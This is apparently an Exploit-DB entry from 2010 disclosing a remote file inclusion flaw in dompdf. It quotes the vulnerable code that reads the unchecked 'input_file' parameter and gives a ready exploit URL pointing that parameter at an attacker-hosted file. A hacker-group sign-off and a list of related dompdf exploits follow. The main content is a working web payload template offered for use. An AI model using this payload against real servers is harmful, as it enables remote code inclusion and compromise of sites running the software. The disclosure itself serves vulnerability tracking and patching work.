================================== apps dompdf RFI Vulnerability ================================== ==================================================== [x] ExpL0it TitLe : apps dompdf RFI Vulnerability [x] DatE : 01 September 2010 [x] AutH0r : Andre_Corleone [x] Software Link : www.digitaljunkies.ca/dompdf/ [x] h0mE : http://tecon-crew.org [x] TestEd 0n : linux ubuntu 10.04 [x] d0rK : :P ==================================================== ========================================================================================== [x]bug heRe: if ( isset($_GET["input_file"]) ) $file = rawurldecode($_GET["input_file"]); else throw new DOMPDF_Exception("An input file is required (i.e. input_file _GET variable)."); ========================================================================================== ================================================================== [x]expL0iT: http://www.site.com/dompdf/dompdf.php?input_file=[evilc0de.txt?] ================================================================== ============================================================================================ [x]th4nKs t0: ALLAH SWT,Muhammad SAW,my Parents,my lovely HerliZ Dian Permathasari guitariznoize | zee_eichel | jImMYrOmAnTiCdEvIl | 45tr0_k1ll1n9 | all Tecon Crew | and you ============================================================================================ ===================== [x]Jakarta,Indonesia =====================
Related Exploits
Trying to match CVEs (1): CVE-2010-4879Trying to match OSVDBs (1): 56579
Trying to match setup file: 4db19b2bf601ac5ff8c3ab49a67e46c8
Other Possible E-DB Search Terms: dompdf 0.6.0 beta1, dompdf
Date | D | V | Title | Author |
---|---|---|---|---|
2014-04-24 |
![]() |
dompdf 0.6.0 - 'dompdf.php?read' Arbitrary File Read | Portcullis | |
2014-12-02 |
![]() |
TYPO3 Extension ke DomPDF - Remote Code Execution | RedTeam Pen... |